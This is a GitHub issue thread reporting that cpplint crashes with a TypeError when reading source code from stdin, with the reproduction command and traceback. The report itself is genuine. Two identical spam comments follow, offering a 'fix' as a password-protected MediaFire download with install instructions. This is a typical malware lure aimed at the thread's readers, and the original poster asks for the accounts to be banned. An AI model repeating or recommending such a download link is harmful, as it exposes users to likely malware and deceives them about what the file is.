### ISSUE TITLE
Reading from stdin might not work.

### ISSUE THREAD

**Issue by matyalatte** [cpplint/cpplint#283]
cpplint.py says it can read code from stdin when using `-` as a file path.
https://github.com/cpplint/cpplint/blob/develop/cpplint.py#L6652

So, I tried `echo "int a = int(1.0);" | python cpplint.py -` on Ubuntu 20.04 with Python3.8.

What I expected was like this.
```
Done processing -
-:1:  Using deprecated casting style.  Use static_cast<int>(...) instead  [readability/casting] [4]
Total errors found: 1
```

But I got an error.
```
Traceback (most recent call last):
  File "cpplint.py", line 6970, in <module>
    main()
  File "cpplint.py", line 6955, in main
    ProcessFile(filename, _cpplint_state.verbose_level)
  File "cpplint.py", line 6660, in ProcessFile
    lines = codecs.StreamReaderWriter(sys.stdin,
  File "/usr/lib/python3.8/codecs.py", line 701, in read
    return self.reader.read(size)
  File "/usr/lib/python3.8/codecs.py", line 500, in read
    data = self.bytebuffer + newdata
TypeError: can't concat str to bytes
```

I tried both the latest commit and v1.6.1 but got the same result.

Am I missing something? or is it a bug?

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by matyalatte** [comment]
Plz ban these guys
